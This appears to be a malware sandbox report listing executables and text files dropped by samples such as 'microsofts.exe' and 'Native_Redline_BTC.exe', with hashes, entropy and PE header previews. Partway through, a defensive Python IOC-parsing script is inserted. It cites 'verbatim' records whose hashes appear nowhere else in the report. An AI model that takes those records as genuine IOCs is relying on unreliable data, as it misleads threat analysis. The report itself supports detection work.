SHA-256:3A9A6E4716EF14D4E25508A3E7910B516CF1C9AE0E01B856AFF5B16848864A38
SHA-512:68DC3052026EDE828E076C9E65E6D0FF12D0F419B52D8FE2AA4EFD7C1CE5761A366BEB1C49FBD33DD2AF1CFA048E5CE854DC8B5B11491FB9263C2EE4862DE3EB
Malicious:true
Reputation:unknown
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4897792
Entropy (8bit):6.8297581052184855
Encrypted:false
SSDEEP:49152:f8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKX:uv2gM+qwXLg7pPgw/DSZHBD527BWG
MD5:85F786ECE93BE42A646D36C3997994CC
SHA1:1927422BEF97C65CFE5A1C9C8DE296BFF04D942D
SHA-256:45FA1F0A56D88F72CEC7FC1D9D067F8A50FE6B801669230F21CA8F73E77C763D
SHA-512:B57A8173E73C7A3C4EFD87E89E4ACA433AA8AFDD5A9B7A97DC369151568019EC821EF65B0E59E4265244EAF0C601061F026E3AF2DAE0AC327C62FBA81390BB7C
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......tK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
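The dropped-file records above are all reproducible from the file bytes: the four digests, the "Entropy (8bit)" field (Shannon entropy in bits per byte), and the "PE32"/"PE32+" file type, which the "Preview" column actually shows in the raw: the bytes right after the "PE" signature read "L." (0x014c, i386) in the one PE32 record and "d." (0x8664, x86-64) in every PE32+ record. The script below is an added example, not Joe Sandbox code or the sample's: it parses two records copied verbatim from this report into a hash IOC list (rejecting malformed digests), recomputes the digests and the 8-bit entropy for any buffer, and reads bitness from the COFF header. The PE buffers it checks are constructed minimal headers, not the dropped files themselves.

```python
"""Added example (not Joe Sandbox code): reproduce the per-file attributes in a
'Dropped Files' record and turn records into a hash IOC list. REPORT_RECORDS is
copied from this report; the PE buffers for the bitness check are constructed."""
import hashlib
import math
import re
import struct
from collections import Counter

# Two records copied from this report (only the fields this script uses).
REPORT_RECORDS = r"""
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
MD5:6CF50C9A5EB19C2B73D5D1034B2E177F
SHA1:30BBF9822FF8EAFE9D70563AC6FB0EDC6EF9CAB8
SHA-256:493A8F50ED1C3E48397AF86B0E53255524F303662C8EC29CB98DB01E4925F7EC
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
MD5:C08BF75AAED9A03556E5C74639D923E8
SHA1:54DCB32E53F81D6814FB6A926F31914906884BDC
SHA-256:4AC0410F805846FB8426A5E62D6F27EB20F633A9130456DF314DC6E339A10E3B
Malicious:true
"""

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}
HEX_RE = re.compile(r"[0-9A-Fa-f]+")


def parse_records(text):
    """One dict per dropped file; a record starts at each 'Process:' line.
    Split on the first colon only so drive-letter paths survive intact."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def ioc_list(records):
    """Lower-case (algorithm, digest) pairs for every Malicious:true record.
    Wrong length or non-hex characters raise, so a mangled copy never becomes
    an IOC that silently matches nothing."""
    iocs = []
    for rec in records:
        if rec.get("Malicious") != "true":
            continue
        for algo, length in HASH_LENGTHS.items():
            digest = rec.get(algo)
            if digest is None:
                continue
            if len(digest) != length or not HEX_RE.fullmatch(digest):
                raise ValueError(f"malformed {algo} digest: {digest!r}")
            iocs.append((algo, digest.lower()))
    return iocs


def file_hashes(data):
    """The four digests the report prints, upper-cased as the report does."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def entropy_8bit(data):
    """Shannon entropy in bits per byte (the 'Entropy (8bit)' field): 0.0 for a
    constant buffer, 8.0 for uniform bytes. Near 8 means packed/encrypted data;
    the 6.2-6.8 range above is typical of plain compiled code."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# COFF Machine values as they appear in the Preview column: 'PE..L...' is
# 0x014c (bytes 4c 01), 'PE..d...' is 0x8664 (bytes 64 86).
MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def pe_bitness(data):
    """'PE32+ (x86-64)' etc. from the COFF Machine word and optional-header
    Magic, or None when the buffer is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]      # e_lfanew
    if len(data) < pe_off + 26 or data[pe_off:pe_off + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, pe_off + 4)[0]
    magic = struct.unpack_from("<H", data, pe_off + 24)[0]
    return f"{OPTIONAL_MAGIC.get(magic, 'PE?')} ({MACHINES.get(machine, hex(machine))})"


def build_min_pe(machine, magic):
    """Constructed header: DOS stub with e_lfanew=0x40, 'PE\\0\\0', a 20-byte
    COFF header and the optional-header Magic. Enough for pe_bitness(), nothing more."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff + struct.pack("<H", magic)


if __name__ == "__main__":
    for algo, digest in ioc_list(parse_records(REPORT_RECORDS)):
        print(algo, digest)
    print(pe_bitness(build_min_pe(0x8664, 0x20B)), pe_bitness(build_min_pe(0x014C, 0x10B)))
    print(entropy_8bit(bytes(range(256)) * 4), entropy_8bit(b"\0" * 1024))
```

Exact-hash IOCs from a report like this are cheap to sweep for but also cheap for the operator to invalidate (any rebuild changes all four digests); the SSDEEP field, the one attribute not recomputed here, is what you would use to cluster later drops against these, and the behavioural signatures in the report header are what should drive detection.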
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4897792
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.829758227709845
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:G8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKX:Fv2gM+qwXLg7pPgw/DSZHBD527BWG
                                                                                                                                                                                                                                                                                                          MD5:EA627F6D1152BE753F79000FD5E97F70
                                                                                                                                                                                                                                                                                                          SHA1:D6D09B96E2020A32FAED68FAAE14EBF202BA36A2
                                                                                                                                                                                                                                                                                                          SHA-256:ABDA46CD1F64781B6D050EF7071CA7E697891220E6A3F30CA486E73C5CE843D8
                                                                                                                                                                                                                                                                                                          SHA-512:39DAC1A2F4AB91F3F1BA708DF1EF43CA61F0B0805C65C383D4EB2AD6E83A963C1CCCEF53B5FBC2BC7680458BA4E929CD7DF494C61956C426CCD3B24A694D5C7F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2156544
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.953556706948554
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:8tjqL8fH+8aUbp8D/8+xyWAGsqjnhMgeiCl7G0nehbGZpbD:4jKK+81FI/8z4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:488424D4723D4E1B4D173DCCF31C79FD
                                                                                                                                                                                                                                                                                                          SHA1:B604CB7C722219E57CBF0B21C0516C84A2E22FA3
                                                                                                                                                                                                                                                                                                          SHA-256:41AE5B7789B780672A3EF873C64BF7C77137711AAB7B53AE63B525D0CDB112DB
                                                                                                                                                                                                                                                                                                          SHA-512:A153559FCC92762C624AE0820E993A1F5FAA67425D2EA640C50303227250BA9657BCF07DC7BD03153A36617D26E95DA1DDD9720E1D0451BD47A6C0964F254D99
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P".......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2370560
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.032366330447843
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:KAMsOu3JfCIGnZuTodRFYKBrFDbWpaDmg27RnWGj:KAMa38ZuTSfD527BWG
                                                                                                                                                                                                                                                                                                          MD5:F90E911CD27118F83D33FA418E4A4993
                                                                                                                                                                                                                                                                                                          SHA1:90A5514B81DD5E111DEE258689F36BB9674F9AC2
                                                                                                                                                                                                                                                                                                          SHA-256:938D3B818AD22CDAC2CEF54F8E513F7DED09D836F94677482FD6018D00A99B1F
                                                                                                                                                                                                                                                                                                          SHA-512:BF359EECF673010BB5F897EB7F73FEC4F507EF99ACE8CA99DBD72949F22B661CE257264E519F4C63B07E52F62864E6AF0063A3B1F21D304596B6C6F2C1D8CF0F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......I$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1984512
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.10431876354382
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:YwbK7tnhD4aH6wD2Krx5NgOOagQE8JasqjnhMgeiCl7G0nehbGZpbD:YSK7Fhslq2EPfOGEDDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:299EDED21839276421A1362259ECA51D
                                                                                                                                                                                                                                                                                                          SHA1:E32CE32F9291D2B8CED2BD0A90E6145F11C3C997
                                                                                                                                                                                                                                                                                                          SHA-256:795046E3B391A6CBEE39F196EF8BFD919413D9106E16E12CDBFE069CEF1F5FC3
                                                                                                                                                                                                                                                                                                          SHA-512:16EE88274667576B2F01A8A4F0B32E5D3DB9A9E6BE5FE2BD4C32BF41C26BFE1BD21297F2FEFA697025F8E86D05E502AD03C3DFEEE36771D3FF4475B4974EB4F5
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1779712
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.158042961213183
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:FKI7Twj5KDHxJ1FxyD+/wsG18bbQqsqjnhMgeiCl7G0nehbGZpbD:Fv7e0j31mD+/wDGb9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:E3B8095EED961294DFC81E1D15C8ADCD
                                                                                                                                                                                                                                                                                                          SHA1:0AE9B3AD57C90FBE655B31BB3645087C58EBEC81
                                                                                                                                                                                                                                                                                                          SHA-256:7FCC6ECFF64AA38194FC7720F9C3C18E4F739D50F557317BF5CB008499AA625C
                                                                                                                                                                                                                                                                                                          SHA-512:DFB1351B450011AB3E49105FECF3A4D3B0843D88FDA21E86345510E2CB5749BE8C8D743C1C25D17F71D14BB5169AC52548B6FA8592785C47DBA6B914F6A423AD
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
Size (bytes):1378304
Entropy (8bit):5.37742148672151
Encrypted:false
SSDEEP:12288:EQUVPDHhSNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:/yhSNsqjnhMgeiCl7G0nehbGZpbD
MD5:4AD70F1D2A14193E45BBB76620D9D3BE
SHA1:678EBA52F69D8131B680C1D7254C1D728C280231
SHA-256:25710DF98672F723CC8D5B146BAECE8B00D768DAD4965462E4BC5C29C717701D
SHA-512:42037364325DD550DA2216B6E677C78C1E32EF2DE71AC99E3266B423367C04126DD43D582AFEAD4487B434AA7355E57768D4290B06F422319AC5813C126DC01A
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1286656
Entropy (8bit):7.222098544995581
Encrypted:false
SSDEEP:24576:xsFfc1VyFn5UQn652bO4HisqjnhMgeiCl7G0nehbGZpbD:xsFcIn5rJMDmg27RnWGj
MD5:F402C092103117332D1BF7E494328F9E
SHA1:C6F62192BC38EC47949C1CF5BCB52C2CF7006328
SHA-256:6173212ADA1EF02A128075CEBC0ECF84F4A352D107A4B1324A334D714542C7BB
SHA-512:F739364C076E4DA8C55AF160102EE6967F4D1FD7864BC880B20CEB35425CC19106A5C431F6F6EFA3B50CD3FB08FF2A6325ECEB7D522B545823C3260E9840E275
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1246208
Entropy (8bit):7.49425964918078
Encrypted:false
SSDEEP:24576:ft9o6p4xQbiKI69wpemIwpel9BsqjnhMgeiCl7G0nehbGZpbD:ft9faQbtl2peapel7Dmg27RnWGj
MD5:121E866E192FA8130D6F5CE277DA933D
SHA1:78B23BBA5A4AC772D4FB5A952E67509001F21909
SHA-256:11BBE111EDA8B3264A82AC1BF55B78A807254C9C5AB5D2C4F6D07AAB7F95D12E
SHA-512:C4997C9435B2E5117DD1EEEB87261802AF31F5AA44453D5FF9D1ABC2BEAB913DA57442BCA2CE5518400B9B52E43506A7D3A97C797F9AFA3603B4E6200672866E
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1356800
Entropy (8bit):5.347820611221574
Encrypted:false
SSDEEP:24576:pQVTZu0JqsqjnhMgeiCl7G0nehbGZpbD:qVTZuLDmg27RnWGj
MD5:47B60E7BD7B55BB5EEBD1FDD2FDB0137
SHA1:8AC77A07BF7CF222E669C73D7244463C7DA7DE1C
SHA-256:2B53ED86B57739A082479D09F086E662FF324B3C352A6D66E3075EBE10DB303A
SHA-512:0AFFEA3A05BEED1BBF44F3BC0EB232A2943EB275AA57162CD87389C91064E0EA1CFEEF0E8E2C91AEEBAD5EDC00EE09508423193010F0F62EC508D3BA8E151B5D
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1344000
Entropy (8bit):6.808344186514582
Encrypted:false
SSDEEP:24576:VC1vpgXcZHzgsqjnhMgeiCl7G0nehbGZpbD:VC1vpIcNcDmg27RnWGj
MD5:3D59DD5A4AF701ACBF6263A78CA7EC58
SHA1:B20F0B1D3D43C31C831581F15D150FE810EB161D
SHA-256:1EFE55F0E53CA032418BB14928F873A3ED2E628588C5216AF66BCED4FFAB2CFF
SHA-512:410B63C1D5C9F37F203F1FA6CBABC2A5B466C5A1F683B897CBF29E7182AD463263DE0E9D29D8180DF9E236869810B3895F5D044200FFAD846275D69F50C3B8B8
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1200128
Entropy (8bit):5.140013496830126
Encrypted:false
SSDEEP:12288:fSwj0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fv0sqjnhMgeiCl7G0nehbGZpbD
MD5:8AA238F9B513CB84033CAE4BDC40C217
SHA1:1178A5198AD311FCC4B554E598C24842B94D26FE
SHA-256:314A209DFF3B26A215948FE91009EA28DE5E6AD7325261C7F8D1416B71EBD617
SHA-512:4287DC5F806CCCC06AA33EAAB0E1C65122FC5B67AF9DBAB28C2A9A80843B1921B196281CA725ADDC56609E9C2A125D88FE707C4B80448AE43CA23AA61395F581
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1408512
Entropy (8bit):5.44114110006722
Encrypted:false
SSDEEP:24576:NWKntIfGpasqjnhMgeiCl7G0nehbGZpbD:U8IeEDmg27RnWGj
MD5:1464418DE04E55FCBC361E207BC34BB2
SHA1:B7BD79FEB2B69557E9DCED2B0FD20575B52E550D
SHA-256:3479072A81AE3F1BA8C0C6DF8FABDA8282C93C57E17D1889E33D4A41AAB9E3A3
SHA-512:C36E3612BAA8BF6857F0756819130A2B2539217B58C6D42A4762A5028FC047379BC14CD27D4FEA06FC6602C59F66AFD811CBD98B9E3E2D99AFC9190E41D2164A
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1185280
Entropy (8bit):5.103270624064531
Encrypted:false
SSDEEP:12288:XIh4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:W4sqjnhMgeiCl7G0nehbGZpbD
MD5:C495F6692A3F767ED5E9177669181D38
SHA1:B9B49C4BB5A326DFA5D43AC79F7D2BB348413B88
SHA-256:77F1E49AEB6692DB0701F733385BD2C194C722D9AC94D93E35F5199ABB09E589
SHA-512:0C26D62F96B000CF110CD042B9505AC824D43BF62E4E238F1077F83E9815D2952C137415B1C4BDA65FA53F18A7BE6D99A15802F7FC54C2DCE0C6FC232490B80B
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1531904
Entropy (8bit):5.4211850794296135
Encrypted:false
SSDEEP:24576:68oREwt2ioQ3J+RxsqjnhMgeiCl7G0nehbGZpbD:68oRpoFFDmg27RnWGj
MD5:D0C13D404CF323172B182289F096B688
SHA1:4672333A732061DE6F96EB14AAE79889F66DA430
SHA-256:6539DD5F05CD716E77D447E3CE469DBECA28D75FC94401C7EA69AE6A49D05D62
SHA-512:FC60A732F0B7E15A5452C4C4154BB30EC8F384FCB885C3A7AB8A284C2D50A910426D286AC6E3AB300318CEE1F162FD92A6C324C0F7F32751C48EE24E2220263C
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1341952
Entropy (8bit):5.238585236153977
Encrypted:false
SSDEEP:24576:3f8HQlDMxHwJ07wxsqjnhMgeiCl7G0nehbGZpbD:3kHQlqwJ0eDmg27RnWGj
MD5:B30C2ECC152BBA1D3D0A6873805A61F3
SHA1:AC8C81F37FFF74B32F606F2E020C192010682C0A
SHA-256:6588FC88B7543D680082EDE3C8CD2E2DBCF80E7CFA2E707F03F6B2DEBD229808
SHA-512:E79D5C5C9EE610F9714421890AA2315FA33D2C3361816EF34EBFF35515BFC003D3315AF6A2CA112390E0E8841F357F432ADC4DB22C09A1D7C77EBA2FACC6C87D
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1534464
Entropy (8bit):7.124585192268956
Encrypted:false
SSDEEP:24576:YSEmYD6gjGPG45QVDkfXplyTyKsqjnhMgeiCl7G0nehbGZpbD:Y5mYD6g2GWQVQf3yThDmg27RnWGj
MD5:D8565DE5DBB9D887813F778309181D9F
SHA1:712DC38D3055D03FB37F44A71FBE25E51500FEDC
SHA-256:E1AD08ED7372CE018B2B1A05A98B0D0D9438F2431E96581F02B277C306E29B4B
SHA-512:9F33235C8BBE30FBA4DC0A1F611D4B86A2C7D1DA099096FDF567C0BCFB7A163CB49924E22C7676B9C802BB5718315ABB610C94543894457764456CBDCCA631D3
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:CSV text
Category:dropped
Size (bytes):425
Entropy (8bit):5.357964438493834
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):410
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                          MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                          SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                          SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                          SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):3094
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                                                                                          MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                                                                                                                                                                                                                                          SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                                                                                                                                                                                                                                          SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
